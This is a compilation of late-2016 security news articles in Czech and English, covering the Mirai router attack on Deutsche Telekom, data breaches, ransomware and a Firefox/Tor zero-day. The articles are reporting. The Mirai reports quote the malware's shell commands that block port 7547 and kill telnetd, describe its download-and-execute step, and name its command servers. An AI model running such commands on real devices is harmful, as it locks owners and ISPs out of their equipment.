Uvedeným vektorem je protokol TR-064, resp. TR-069, který využívá TCP port 7547 a je primárně využíván poskytovateli připojení, jimž umožňuje vzdáleně konfigurovat routery zákazníků. Z nedávno publikovaného ukázkového (proof-of-concept) exploitu však vyplývá, že v případě některých zařízení může tento protokol využít i útočník a docílit pomocí něj spuštění libovolného kódu, který na zařízení zašle. Tohoto postupu užívá i nová verze „Mirai malwaru“, která cílí na některé domácí routery.

O víkendu došlo v návaznosti na snahu botnetu rozšířit se pomocí popsaného kanálu k problémům s internetovým připojením v mnoha geografických oblastech. Při pokusu o infekci nového zařízení totiž malware s výjimkou citelného zpomalení připojení na nakažených zařízeních v mnoha případech způsobil i pád na zařízení běžícího systému, čímž způsobil dočasnou nefunkčnost routeru.

Dezinfekce nakažených zařízení je naštěstí velmi jednoduchá – vzhledem k tomu, že malware se nahrává pouze do operační paměti routeru, stačí jej restartovat a dojde k odstranění infekce. Uvedený postup je samozřejmě nutné doplnit o rekonfiguraci zařízení, resp. instalaci odpovídajícího updatu firmwaru, aby bylo zajištěno, že nedojde k opětovnému nakažení zařízení. Velmi citelně bylo popsaným šířením malwaru zasaženo Německo, v němž bylo, dle vyjádření Deutsche Telekomu, problémy s připojením postiženo přibližně 900 000 lidí. Nakažena byla dle dostupných informací dále například zařízení v Rakousku, Polsku nebo Brazílii.

K internetu bylo dle informací získaných ze serveru Shodan 28. listopadu připojených více než 5 milionů zařízení umožňujících připojení pomocí protokolu TR-064 (aktuálně – 29. listopadu – je jich detekováno o něco méně než 5 milionů). V České republice je počet takových zařízení detekovaných Shodanem o něco vyšší než 72 000, na Slovensku pak počet překračuje 22 000.

Je však vhodné zmínit, že čísla získaná ze služby Shodan nejsou přesná a – jak je zmíněno na posledním uvedeném odkazu – skutečné cifry budou s vysokou pravděpodobností nižší. Rovněž ne všechna zařízení užívající TR-064 jsou z pohledu popsaného mechanismu šíření zranitelná. Je však pravděpodobné – s ohledem na skutečnost, že některé z „malých“ routerů prodávaných v ČR zranitelné jsou – že i v prostředí České republiky se budou počty potenciálních cílů pro rozšíření Mirai pohybovat v řádu desetitisíců.

Druhý největší pornoweb napadli hackeři. Získali e-maily a hesla stovek tisíc uživatelů
Po rozsáhlém útoku na FriendFinder Networks, při němž došlo k úniku 412 milionů přihlašovacích údajů, byl napaden další web s lechtivou tematikou – Podle monitoru Alexa jde o 76. nejnavštěvovanější web světa a druhý nejpopulárnější ve své kategorii hned za Pornhubem.

Motherboard za základě svých zdrojů píše, že se útočníci zmocnili uživatelských jmen, e-mailů a hesel 380 000 účtů. Mezi nimi byly tradičně i e-maily americké armády nebo různých státních úřadů. Magazín vyzkoušel novou registraci s uvedenými maily (50 náhodných) a web tvrdil, že je nelze použít, protože už v databázi jsou.

Neznámý útočník prý objevil zranitelnost Xhamsteru někde v letošním roce, stáhl a dešifroval špatně hashovaná hesla (MD5) a tento balík dat pak prodával. Provozovatelé webu se nicméně brání, že hesla jsou u nich dobře chráněná a jejich rozluštění je prý téměř nemožné.

Pokud na Xhamsteru náhodou máte účet, měli byste ihned změnit heslo. Pokud stejnou kombinaci jména/e-mailu a hesla používáte i na jiných, třeba důležitějších stránkách, pak hesla změňte i tam.

Firefox Zero-Day Exploit to Unmask Tor Users Released Online
30.11.2016 thehackernews
Hackers are actively exploiting a zero-day vulnerability in Firefox to unmask Tor Browser users, similar to what the FBI exploited during an investigation of a child pornography site.
Tor (The Onion Router) is an anonymity software that not only provides a safe heaven to human rights activists, journalists, government officials, but also is a place where drugs, assassins for hire, child pornography, and other illegal activities has allegedly been traded.
A Javascript zero-day exploit currently being actively exploited in the wild is designed to remotely execute malicious code on the Windows operating system via memory corruption flaw in Firefox web browser.
The exploit code was publicly published by an admin of the SIGAINT privacy-oriented public email service on the Tor-Talk mailing list.
The mailing list message reveals that the zero-day exploit affecting Firefox is currently being exploited against Tor Browser users by unknown attackers to leak the potentially identifying information of Tor users, officials of the anonymity service confirmed Tuesday.
Tor Browser Bundle is a repackaged version of Mozilla Firefox web browser that runs connections through the Tor anonymizing network configured to hide its user's public IP address.
"[The exploit code] consists of one HTML and one CSS file, both pasted below and also de-obscured," the author says. "The exact functionality is unknown, but it is getting access to VirtualAlloc in kernel32.dll and goes from there."
That means, when exploit opened by a Firefox or Tor Browser with Javascript enabled on a Windows computer, it leverage a memory corruption vulnerability in the background to make direct calls to kernel32.dll, which allows malicious code to be executed on computers running Windows.
Researchers also found that the exploit submits users' machine details to (a remote server hosted on the OVH-hosted virtual machine in France) on port 80, which is no longer responding at the time of writing.
Although security researchers are still analyzing the Tor exploit code, a disassembly of it shows the latest zero-day flaw is very similar to a separate Tor Browser exploit that emerged in 2013.
The 2013 exploit was the work of the United States FBI, which was targeting Tor users who accessed child pornography.
Although Mozilla is scrambling to patch the critical vulnerability, it is still unknown who is behind the current Javascript exploit.
"So it sounds like the immediate next step is that Mozilla finishes their patch for it then…a quick Tor Browser update and somewhere in there people will look at the bug and see whether they think it really does apply to Tor Browser," Tor Project lead Roger Dingledine said.
The critical vulnerability is believed to affect multiple Windows versions of the open source Firefox web browser as far back as Firefox version 41, and up to Firefox version 50.

GCHQ presents CyberChef, an Open Source Data Analysis Tool
30.11.2016 securityaffairs BigBrothers
The GCHQ has released the code of a new open source web tool dubbed CyberChef, specifically designed for analyzing and decoding data.
Open data are a privileged source for intelligence agencies, almost any government is largely investing in technology to analyze them.

Recently the British intelligence Agency, the Government Communications Headquarters (GCHQ), has launched a new open source web tool specifically designed for analyzing and decoding data.

The tool dubbed CyberChef has been presented by the GCHQ as the “Cyber Swiss Army Knife.”

“CyberChef is a simple, intuitive web app for carrying out all manner of “cyber” operations within a web browser. These operations include creating hexdumps, simple encoding like XOR or Base64, more complex encryption like AES, DES and Blowfish, data compression and decompression, calculating hashes and checksums, IPv6 and X.509 parsing, and much more.” reads the description published by the GCHQ on GitHub.

“The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years. Every effort has been made to structure the code in a readable and extendable format, however it should be noted that the analyst is not a professional developer and the code has not been peer-reviewed for compliance with a formal specification.”


A point of strength is its user-friendly interface, even non-technical people could analyze encryption, compression and decompression, and data formats with simple drag and drop operations.

The CyberChef is a powerful tool for data analysis that could be used by multiple categories of users, including mathematicians, data analysts, developers and even casual puzzle solvers.

According to the GCHQ, CyberChef runs in Chrome and Firefox, the Agency expects that contributors will soon make it possible to execute it also in Microsoft Edge .

The tool could be used to manipulate different types of data, decode Base64 strings, convert data from a hexdump and perform many other operations.

The GCHQ released the source code of the tool on GitHub alongside with a demo. The GCHQ is inviting the community of developers to contribute to the improvement of the tool.

“It is hoped that by releasing CyberChef through Github, contributions can be added which can be rolled out into future versions of the tool, and is an excellent example of GCHQ providing a platform on which to base cybersecurity operations,” GCHQ said.

Europol and other law enforcement agencies shut 4,500 websites peddling fake brands

30.11.2016 securityaffairs Crime

In a massive crackdown, European police and law enforcement agencies worldwide seized more than 4,500 domains trading fake brands.
The Europol conducted a massive crackdown against websites offering counterfeit products as part of the campaign dubbed “Don’t F***(AKE) Up.” The European law enforcement agency aims to halt the activity of online scammers who offer for sale fake brands.

The agency launched a public awareness and prevention campaign online to allow netizens spotting fake websites and social media scams.

This sale of these products causes serious damage to the finance and the reputation of the official brands, in some cases, they pose a serious threat to “the health and safety of buyers.”

Authorities seized more than 3,500 items of clothing and fake luxury goods, including shoes, bags and perfumes purporting to be such brands as Nike, Adidas, and Kenzo.

Dutch anti-fraud police have identified and arrested 12 people across the country and searched their homes.

“The internet has become an essential channel for e-commerce. Its instant global reach and anonymity make it possible to sell nearly anything to anyone at any time,” reads the official statement from the Europol.

“Counterfeiters know it and are increasingly exploiting the unlimited opportunities” the internet offers.

The operation involved law enforcement agencies across 27 countries in Europe, in the US and Canada. Authorities shut down more than 4,500 websites that were used by criminal organizations to offer for sale various products, including “luxury goods, sportswear, spare parts, electronics, pharmaceuticals, toiletries and other fake products.”

This operation is the result of a continuous effort spent by law enforcement worldwide, every year European authorities seize thousands of domains with the support of the US Immigration and Customs Enforcement and Homeland Security.

“a significant increase in the number of seized domain names compared to last year,” said Europol director Rob Wainwright.

The police observed a significant increase in the number of sale of counterfeit goods through the social networking platform, including Facebook and Instagram.

europol-awareness fake brands

“This is a relatively new phenomenon in the trade in counterfeit brand names,”states an official statement from the Dutch Fiscal Information and Investigation Service (FIOD).

This is a profitable period for crooks, starting from the Black Friday and going on for the entire holiday time, users are more exposed to such kind of scams.

“When shopping online, you are more likely to fall victim to counterfeiters,” it said as “without the physical product to look at and feel, it can be more difficult for you to spot the differences.”

Customers of Liechtenstein banks blackmailed by ransomware
29.11.2016 securityaffairs
Hackers are targeting Liechtenstein banks with ransomware-based attacks and are threatening to disclose customers sensitive information.
Hackers are targeting Liechtenstein banks with ransomware-based attacks. The situation is particularly concerning due to sensitive nature of the data that are stolen by crooks. Cyber criminals, in fact, are allegedly blackmailing customers by threatening to release their account data in case ransoms are not paid by the victims.

According to the Bild am Sonntag, the hackers gain access to account data from Valartis Bank Liechtenstein and stolen information on several clients, including politicians, actors, and other individuals.


The director Andreas Insam told the newspaper Bild am Sonntag that its organization has already alerted the authorities.

“Attackers accused the bank board of not paying them for security services, likely bug poaching rather than legitimate testing, claiming their “intention is not to harm” and have to “resort to” extortion.” reported El Reg.

The cyber criminals are allegedly demanding up to 10 per cent of account balances in order to avoid disclosing customers’ information. The hackers, of course, accept payments in Bitcoin, they are threatening to disclose the information to authorities and media if the victms will not pay the ransom by December 7.

The Bild am Sonntag obtained three distinct messages (letter 1, letters, letter 3) from the hackers that claim to have siphoned several gigabytes of data from the targeted accounts. Information also includes the victims’ correspondence.

The letters published by media confirm the intention of the hacker to blackmail the victims by threatening with revealing alleged dirty affairs, including tax evasion.

At the time I’m writing the Bitcoin addresses used by the crooks for the payment were not disclosed in order to avoid tracking ransom payments of the victims.

An audit revealed dozen vulnerabilities in the cURL
29.11.2016 securityaffairs
Security experts who conducted an audit on cURL discovered nearly a dozen vulnerabilities that were patched in the last release.
The cURL (read “see URL”) is an open source command line tool and library designed for transferring data through various protocols.

The cURL is included in a wide range of applications, including networking devices, printers, smartphones, IoT devices and even cars.

Recently Daniel Stenberg, lead developer of cURL and Mozilla employee, requested a security audit of cURL from the Mozilla Secure Open Source (SOS) program.

“I asked for, and we were granted a security audit of curl from the Mozilla Secure Open Source program a while ago. This was done by Mozilla getting a 3rd party company involved to do the job and footing the bill for it. The auditing company is called Cure53.” wrote Stenberg in a blog post. “I applied for the security audit because I feel that we’ve had some security related issues lately and I’ve had the feeling that we might be missing something so it would be really good to get some experts’ eyes on the code,”

Five experts at the security services provider Cure53 conducted an audit that lasted 20 days and revealed a total of 23 issues.

The issued discovered by the experts include nine security flaws. Two security vulnerabilities were merged by the experts and one of them was classified as a “plain bug” because its exploitation is very hard in a real attack scenario.

Four vulnerabilities have been rated “high severity” and four are considered “medium severity.”

“The assessment of the tool was performed by Cure53 as part of the Mozilla’s Secure Open Source track program. The results of the project encompass twenty-three security-relevant discoveries.” reads the Pentest-Report cURL 08.2016 published by Cure53.”As for the approach, the test was rooted in the public availability of the source code belonging to the cURL software and the investigation involved five testers of the Cure53 team. “


The high severity flaws tracked as CVE-2016-8617, CVE-2016-8619, CVE-2016-8622, and CVE-2016-8623, are remote code execution vulnerabilities.

The report states that “the overall impression of the state of security and robustness of the cURL library was positive.”

Anyway, don’t worry! A new version of the software component it available online. The new version 7.51.0 addresses a total of 11 vulnerabilities. The release fixes seven issues found by the Cure53’audit, while the remaining were reported by Luật Nguyễn, Christian Heimes and Fernando Muñoz.

Stenberg highlighted that cURL is one of the most used software products, for this reason, this audit assumes an extraordinary importance for its users.

“Also, as curl is one of the most used software components in the world a serious problem in curl could have a serious impact on tools, devices and applications everywhere. We don’t want that to happen.”

More than 900k routers of Deutsche Telekom German users went offline
29.11.2016 securityaffairs Hacking

Deutsche Telekom confirmed that more than 900,000 routers began to have serious problems connectivity problems due to a cyber attack.
More than 900,000 routers belonging to Deutsche Telekom users in Germany were not able to connect to the Internet due to an alleged cyber-attack.

The affected routers were used by the Deutsche Telekom customers also for fixed telephony and TV services.

The problems lasted at least two days, the outage began on Sunday, November 27, at around 17:00, local time.

Deutsche Telekom users all over the country were not able to connect online using the users provided by the company.

Below a graphic representation of the outage provided by the

deutsche telekom router-issue

The outage lasted a couple of hours on Sunday, then the problems continued on Monday morning from 08:00.

The company notified via Facebook its 20 million customers to have solved the problems at around 12:00, local time, but users continued to face connectivity issues.

What has happened?

According to the company, hackers targeted the routers exploiting a security issue. Deutsche Telekom and router vendors are working together to develop a firmware fix and roll out the software patch.

Deutsche Telekom is currently rolling out firmware updates.

“The massive interference from connections of Deutsche Telekom, according to findings from the Federal Office for Security in Information Technology (BSI), follow a worldwide attack.” reads the

“According to BSI, the attacks were also noticeable in the government-protected government network, but could be repelled with effective protection measures. “

Deutsche Telekom customer case recommended that users unplug their devices, wait for 30 seconds and restart their router. In case this procedure is not able to restore the connectivity it is suggested to permanently disconnect the router from the Deutsche Telekom network.

“German Telekom is now offering a firmware update for the affected routers. Details (in German) are here:–zubehoer/router/speedport-w-921v/firmware-zum-speedport-w-921v. Affected user are advised to power off their router and power it on again after 30 seconds. During bootup the router should retrieve the new firmware from the Telekom servers.” reported the SANS Institute.

Deutsche Telekom is offering free mobile Internet until the technical problem is resolved.

Deutsche Telekom didn’t provide further technical details about the alleged cyber attack either the affected router models.

It is not clear which is the threat that compromised the Deutsche Telekom routers, experts speculated the involvement of a malware that could have prevented equipment from connecting to the company’s network.

Security experts from ISC Sans published an interesting report that revealed a significant increase in scans and exploitation attempts for a SOAP Remote Code Execution (RCE) vulnerability via port 7547 against Speedport routers.

This specific model of routers is widely used by Deutsche Telekom for German users.

“For the last couple days, attack against port 7547 have increased substantially. These scans appear to exploit a vulnerability in popular DSL routers. This issue may already have caused severe issues for German ISP Deutsche Telekom and may affect others as well (given that the US is just “waking up” from a long weekend). For Deutsche Telekom, Speedport routers appeared to be the main issue.” added the ICS SANS.

“According to Shodan, about 41 Million devices have port 7547 open. The code appears to be derived from Mirai with the additional scan for the SOAP vulnerability. Currently, honeypots see about one request every 5-10 minutes for each target IP.”

According to the ICS SANS report, it seems that attackers tried to exploit a common vulnerability in the TR-069 configuration protocol. Experts highlighted the availability of a Metasploit module implementing the exploit for this vulnerability.

An unconfirmed List of vulnerable routers includes the Eir D1000 Wireless Router (rebranded Zyxel Modem used by Irish ISP Eir) and the Speedport Router (Deutsche Telekom).

Of course. when dealing with IoT devices and cyber threats, the most dreaded malware is the Mirai bot that was recently involved in several massive DDoS attacks.

According to BadCyber, the responsible is the Mirai botnet that was designed to exploit Eir D100 (Zyxel Modems) via port 7547.

“TR-064 protocol is based on HTTP and SOAP and its default port is TCP 7547. Commands are sent as POST requests to this port.” states the BadCyber.

!The malware itself is really friendly as it closes the vulnerability once the router is infected. It performs the following command:

busybox iptables -A INPUT -p tcp –destination-port 7547 -j DROP

busybox killall -9 telnetd

which should make the device “secure”, unless until next reboot. The first one closes port 7547 and the second one kills the telnet service, making it really hard for the ISP to update the device remotely.”

New wave of Mirai attacking home routers
29.11.2016 Kaspersky 
Starting from yesterday, many DSL customers in Germany were reporting problems with their routers, which weren’t able to connect to their ISP anymore or that the internet connection was very weak. Today we saw news, that a malicious attack could be the reason for this widespread problem.

Fortunately we got some more technical details from users reporting the specific behaviour. With this information, were able to get hands on some samples and were able to reconstruct some details. Let’s have a quick look:

Exploiting the remote management protocol
As mentioned, users were seeing suspicious network activity. They saw this request incoming on TCP port 7547:


This request is described in the TR-064 specification of methods for configuring DSL CPE (customer-premises equipment).

A vulnerability in affected routers causes the device to download the binary with file name “1” from http://l.ocalhost[.]host to the /tmp/-directory and executes it. The IP addresses of this host changed a few times during the day. Starting from 28th November 2016, 16:36 CET the domains cannot be resolved to domains anymore (“NXDOMAIN”).

Mirai related binary
During a quick analysis of the ELF 32-bit MIPS-MSB (big endian) variant used in todays attacks on German customers, we saw this Mirai-related sample perfoming this behaviour:

Delete itself from filesystem (resides only in memory)
Close vulnerable port using iptables: “iptables -A INPUT -p tcp –destination-port 7547 -DROP“
Resolve command and control servers using DNS
Scan the internet for open TCP 7547 and infect other devices using the same malicious request as seen above.
Since the malware is not able to write itself to the router’s persistent filesystem, the infection will not survive a reboot.

Our products detect the corresponding binaries as HEUR:Backdoor.Linux.Mirai.b

Update (2016-11-28 19:50 CET)

At the moment the C2 servers timeserver[.]host and securityupdates[.]us are both pointing to US military related IPs in the range. Since there is no Mirai related infrastructure behind this network range, the bots will not receive any further commands until the criminals behind this attack will change the DNS records again. For sure, this is some kind of trolling from the criminals who conducted the attack.





Japan is investigating security breach of Defence Information Infrastructure

28.11.2016 securityaffairs Cyber

The Japanese Government is investigating a reported security breach suffered by the High-speed Defence Information Infrastructure (DII) network.
The Defence Information Infrastructure is a high-speed large-capacity communication network connecting SDF bases and camps. The Defence Information Infrastructure comprises two distinct networks, one connected to the Internet and an internal network.

The security breach took place in September but media have disclosed it only now, the South China Morning Post reported that the attack was confirmed by unnamed ministry officials on Sunday morning.

According to the SCMP hacker penetrated the Ground Self-Defence Force. The hackers first breached a network shared between Japan’s National Defence Academy and its National Defence Medical College, then with a later movement, they got access to the Defence Information Infrastructure network.

“The Japanese Defence Ministry and the Self-Defence Forces discovered in September that their shared communication network had suffered a cyberattack that enabled a hacker to penetrate the Ground Self-Defense Force’s computer system, ministry sources said on Sunday.” reported the South China Morning Post.

“Some information may have been leaked in the incident, with an organised attacker such as a nation state strongly suspected, but the full scope of the damage is not clear, the sources said.”

Defence Information Infrastructure
New SDF unit – The Japan Times

How is it possible?

Bloomberg quoted Kyodo news that citing ministry sources in an earlier report, explained the hackers took advantage of the fact that computers at Japan’s National Defense Academy and National Defense Medical College are connected both to a university network and to an internal network linking military bases.

The news was reported by Bloomberg who linked the attack to a nation-state actor due to the complexity of the attack and the nature of the target,

The South China Morning Post reports of a highly skilled attack that leads the ministry immediately raise the cybersecurity alert level in the country.

Masakazu Saito, a senior ministry official in charge of cyber security issues, did not comment the incident.

Bloomberg commenting the alleged attack states that report also cited senior military officials as saying the attack managed “as a crisis”. In response to the incident, staff at the ministry and the Self-Defense Forces were temporarily banned from connecting to the Internet.

“It is a very serious situation. We must quickly take measures to prevent a recurrence.” said a senior SDF official.

Cyber attacks against Japanese organizations are nothing new, below a short list of major hacking campaigns that targeted the country:

August 2011: Mitsubishi Heavy Industries (defense contractor) networks infected by malware that sent outside information on defense systems.
October 2011: A cyber espionage campaign originated from China exposed sensible information at least a month.The infection was possible thanks phishing campaign against Lower House member started in July. Also in this case a malware was used for the attack.
December 2012: the Japan Aerospace Exploration Agency was hit by a virus that stolen secret information on newest rockets from an internal computer. The precious information was stored on a computer in Tsukuba Space Center located in northeast area of Tokyo.
July 2012: The Japanese Finance Ministry announced that its computers have been infected with a virus in the from 2010 to 2011 causing leaks of information.
September 2013: Security experts at FireEye discovered the Operation DeputyDog against Japanese entities that exploits Zero-Day (CVE-2013-3893) recently announced by Microsoft.
August 2015: Security experts at Kaspersky Lab have analyzed the cyber attacks run by the Blue Termite APT, a hacking crew group focused on Japanese organizations.
February 2016: Japanese commercial and critical infrastructure organizations have been targeted a long-running campaign dubbed Operation Dust Storm.
October 2016: The threat actor behind the Blackgear cyber-espionage campaign that is targeting Japanese entities is the same that hit Taiwan in 2012.
Bloomberg states that Japan’s Defense Ministry denied a military computer network had suffered a high-level cyber attack in September.

“A public affairs official at the ministry said the report wasn’t true, and that it receives numerous suspicious e-mails and other forms of contact believed to be cyber attacks on a daily basis. The official, who declined to be named in line with government policy, also said the ministry doesn’t comment on such attacks as that would expose its ability to deal with them.” reported Bloomberg.

Malicious code and the Windows integrity mechanism
28.11.2016 Kaspersky 

Ask any expert who analyzes malicious code for Windows which system privileges malware works with and wants to acquire and, without a second thought, they’ll tell you: “Administrator rights”. Are there any studies to back this up? Unfortunately, I was unable to find any coherent analysis on the subject; however, it is never too late to play Captain Obvious and present the facts for public evaluation.

My goal wasn’t to review the techniques of elevating system privileges; the Internet already has plenty of articles on the subject. New mechanisms are discovered every year, and each technique deserves its own review. Here, I wanted to look at the overall picture and talk about the whole range of Windows operating systems in all their diversity dating back to Windows Vista, but without discussing specific versions.

Step Back in Time

The Windows XP security model differs significantly from the security model of Windows Vista and newer operating systems. There are two types of user accounts in Windows XP: a standard account and an administrator account. The vast majority of users worked with administrator rights, despite the fact that they didn’t need the rights for everyday tasks. These people infected their systems with malicious software that acquired the rights of the current user and, more often than not, they were administrator rights. As a result, the malicious software did not encounter any serious problems acquiring elevated privileges in a system running Windows XP.

This mechanism was used until the release of the Windows Vista family, where Microsoft introduced a new security model: Windows integrity mechanism.


Integrity Level in Windows 10

Roughly speaking, the two aforementioned user account types are present in the new mechanism; however, the operating system now utilizes the Admin Approval Mode. Yes, that very same, our “beloved” UAC (User Access Control). As soon as there is a need for elevated privileges, a UAC dialog pops up and prompts the user for permission to perform a certain action.

The human factor is one of the primary security problems, and that is why placing responsibility on a user who doesn’t know the first thing about computer security is, to say the least, a questionable decision. Microsoft itself has issued the following statement on the topic: “One important thing to know is that UAC is not a security boundary. UAC helps people be more secure, but it is not a cure all. UAC helps most by being the prompt before software is installed.” For those interested in Microsoft’s position on the matter, I recommend reading the following blog posts: User Account Control, User Account Control (UAC) – quick update, Update on UAC.

The Windows Integrity Mechanism

The new Windows integrity mechanism is the main protection component of the Windows security architecture. The mechanism restricts access permissions of applications that run under the same user account, but that are less trustworthy. Put more simply, this mechanism assigns an integrity level to processes as well as other securable objects in Windows. The integrity level restricts or grants access permissions of one object to another.
// Mandatory Label Authority.

#define SECURITY_MANDATORY_LOW_RID (0x00001000L)

// can be set by a usermode caller.

// Mandatory Label Authority.

#define SECURITY_MANDATORY_LOW_RID (0x00001000L)

// can be set by a usermode caller.

I won’t go into detail about the operation of the integrity mechanism. We only need one table to simplify interpretation of the gathered statistics: the table shows the connection between integrity levels and SID security identifiers (see Table 7) that identify the user, group, domain, or computer accounts in Windows.

SID in Access Token Assigned Integrity Level
LocalSystem System
LocalService System
NetworkService System
Administrators High
Backup Operators High
Network Configuration Operators High
Cryptographic Operators High
Authenticated Users Medium
Everyone (World) Low
Anonymous Untrusted
Most applications launched by a standard user are assigned a medium integrity level. Administrators get a high integrity level; services and the kernel receive system integrity. A low integrity level will be assigned to an App Container, for example. This is a typical level for modern browsers that protect the operating system from possible malware intrusions from malicious websites.

Basically, the high level and the levels above it are the ones that malicious software aims for.

Lies, Damned Lies, and Statistics

Contemporary anti-virus products implement a comprehensive approach to system security. That’s why they use dozens of components that prevent malicious code from infecting the system at various stages. Those components may include Web antivirus, script emulators, cloud signatures, exploit detectors, and much more. Data entering the system goes through numerous scans initiated by the different components of an antivirus product. As a result, a huge number of malicious programs do not get to the execution stage and are detected “on takeoff”. As for me, I was interested in malware that did manage to get to the execution stage. A contemporary antivirus product continues to track the potentially malicious object, in that even in the event of its execution, behavioral stream signatures (BSS) of the Kaspersky System Watcher component can be triggered.

So, I asked our Behavior Detection group to assist me in collecting statistics for system privilege levels used for execution by active malware, and which can be detected with the help of BSS.

Within 15 days, I managed to gather data on approximately 1.5 million detections with the help of Kaspersky Security Network. The entire range of Windows operating systems, starting with Windows Vista up to Windows 10, was included in the statistics. After filtering out some events and leaving only unique ones as well as those that do not contain our test signatures, I ended up with 976,000 detections. Let us take a look at the distribution of integrity levels for active malicious software during that period.


Distribution of Integrity Levels

By summing up Untrusted, Low, Medium, as well as High and System, it is possible to calculate a percentage ratio, which I called “OK to Bad”. Although, I assume, the creators of malware would not view this ratio as being so bad.


“OK to Bad” Ratio


What’s the reason for these horrifying statistics? To be honest, I can’t say for certain just yet; a deeper study is required. Sure enough, virus writers employ different methods to elevate privileges: autoelevation and bypassing the UAC mechanism, vulnerabilities in Windows and third-party software, social engineering, etc. There is a non-zero probability that many users have UAC completely disabled, as it irritates them. However, it is obvious that malware creators encounter no problems with acquiring elevated privileges in Windows; therefore, threat protection developers need to consider this problem.

Další vyděračský virus podlehl bezpečnostním expertům. Zpřístupnit data je možné zdarma

28.11.2016 Novinky/Bezpečnost Viry
Bezpečnostním expertům se podařilo vyzrát na další vyděračský virus za posledních několik týdnů. Prakticky žádnou hrozbu díky tomu aktuálně už nepředstavuje záškodník zvaný TeleCrypt. Upozornil na to Národní bezpečnostní tým CSIRT.CZ.
„Bylo prolomeno šifrování použité v ransomwaru TeleCrypt, který pro komunikaci se svým řídícím serverem využívá službu Telegram,“ konstatoval Pavel Bašta, bezpečnostní analytik týmu CSIRT.CZ, který je provozován sdružením CZ.NIC.

Ten zároveň poradil, jak mohou lidé poznat, že jejich stroj infikoval právě tento vyděračský virus. „Tento ransomware lze obvykle rozeznat dle přípony zašifrovaných souborů změněné na .Xcri. Nicméně se již objevily varianty, které změnu přípony neprovedou,“ podotkl Bašta.

Vyzrát na ransomware TeleCrypt se podařilo expertům z bezpečnostní společnosti Malwarebytes Labs. Ti zároveň zpřístupnili nástroj, pomocí kterého je možné zašifrovaná data odemknout i bez placení výkupného. Stahovat jej je možné zdarma zde, k dispozici je však pouze v angličtině.

Podlehly i další viry
V poslední době jde už o několikátý úspěch ochránců kybernetické bezpečnosti. Minulý týden například výzkumníci Kaspersky Lab vytvořili nástroj, prostřednictvím kterého mohou lidé zpřístupnit data zašifrovaná vyděračským virem CrySis.

Způsob útoku nezvaných návštěvníků TeleCrypt i Crysis je úplně stejný. Nejprve záškodník zašifruje všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.

Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení výkupného. Ani pak se nicméně uživatelé ke svým datům nemusejí dostat.

Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné. V případě vyděračských virů TeslaCrypt, TeleCrypt, Crysis či například Polyglot to však již neplatí.

Systém MHD v San Francisku napadli hackeři, jezdilo se zadarmo

28.11.2016 Novinky/Bezpečnost Hacking
Kvůli útoku hackerů na dopravní podnik v San Francisku byla doprava v tomto kalifornském městě o víkendu zdarma. V pondělí o tom informoval portál BBC s tím, že hackeři žádali výpalné 100 bitcoinů (zhruba 1,9 miliónů korun).
Počítače v napadené síti dopravního podniku byly paralyzovány. „Byli jste hacknuti. Všechna data jsou zašifrovaná," zněl vzkaz útočníků. Technici proto z preventivních důvodů odpojili z podnikové sítě všechny automaty na lístky.

Dopravní podnik oznámil, že incident neměl žádný vliv na bezpečnostní systémy či na data o klientech. „Událost nadále vyšetřujeme, takže není vhodné v tuto chvíli poskytovat žádné další informace," sdělila mluvčí.

Systémy podniku byly odstaveny již v pátek, kdy se nejen v USA konal masový výprodej zlevněného zboží známý jako tzv. černý pátek. Jeden z cestujících v rozhovoru s televizí CBS vtipkoval, že to vypadá, že MHD se do akce také zapojilo.

Do nedělního odpoledne se technikům podle International Business Times podařilo automaty na lístky opět zprovoznit. Zda byli hackeři od podnikové sítě zcela odstaveni, jisté ale není.

Univerzita zaplatila
Dopravní podnik se stal obětí vyděračských virů, které jsou známé souhrnným označením ransomware. Piráti se snaží tyto nezvané návštěvníky propašovat především na obyčejné počítače v domácnostech, cílí s nimi ale zároveň také na podnikové sítě.

Své o tom ví také správci počítačové sítě na kanadské univerzitě v Calgary. Kyberzločincům se totiž podařilo v polovině letošního roku nakazit více než stovku tamních PC vyděračským virem a za jejich zpřístupnění požadovali výkupné.

Nebyli přitom žádní troškaři. Za dešifrovací klíč chtěli zaplatit 40 bitcoinů, tedy podle tehdejšího kurzu v přepočtu více než 480 000 korun. Tuto virtuální měnu nezvolili kyberzločinci náhodou. Její pohyb se nedá vystopovat, a tak je prakticky nulová šance, že by mohli být vypátráni.

S ohledem na to, že byla zcela paralyzovaná e-mailová komunikace a že se univerzitní administrátoři nemohli dostat do jednotlivých PC, kde byla uložená důležitá data, rozhodlo se vedení univerzity požadavku hackerů vyhovět. Výkupné zaplatili.

Web rakouského ministerstva zahraničí napadli hackeři

28.11.2016 Novinky/Bezpečnost Hacking
Rakouské ministerstvo zahraničí se stalo terčem hackerského útoku. Hackeři útočili nejspíš z Turecka, informovala agentura DPA. Šéf rakouské diplomacie Sebastian Kurz Ankaru dlouhodobě tvrdě kritizuje.
Co je DDoS

Útok DDoS (Distributed Denial of Service) má vždy stejný scénář. Stovky tisíc počítačů začnou přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se pak takto napadená webová stránka tváří jako nedostupná.
Více zde
„Nenecháme se takovými útoky zastrašit. Rakousko si zachová svůj postoj vůči Turecku," uvedl Kurz, který patří v Evropské unii k nejostřejším kritikům jednání Ankary v migrační krizi i po červencovém zmařeném puči.

Tento týden Kurz, který je členem Rakouské lidové strany (ÖVP), uvítal rozhodnutí Evropského parlamentu, jenž v právně nezávazném usnesení vyzval ke zmrazení přístupových jednání s Tureckem.

Hlavním důvodem přijetí usnesení byly čistky, které turecké úřady zahájily po neúspěšném pokusu o puč. O práci během nich přišlo více než 110 000 lidí a ve vazbě jich skončilo 37 000.

DDoS útok
Hackerský útok na rakouské ministerstvo zahraničí se odehrál již v pátek večer. Úřad svou internetovou prezentaci urychleně odpojil od sítě, když zjistil, že na ni míří neobvyklé množství dotazů, jejichž cílem zjevně bylo stránku zahltit a ochromit. Šlo tedy s největší pravděpodobností o tzv. DDoS útok.

Turecká hackerská skupina se už v září přihlásila k internetovému útoku na vídeňské letiště.

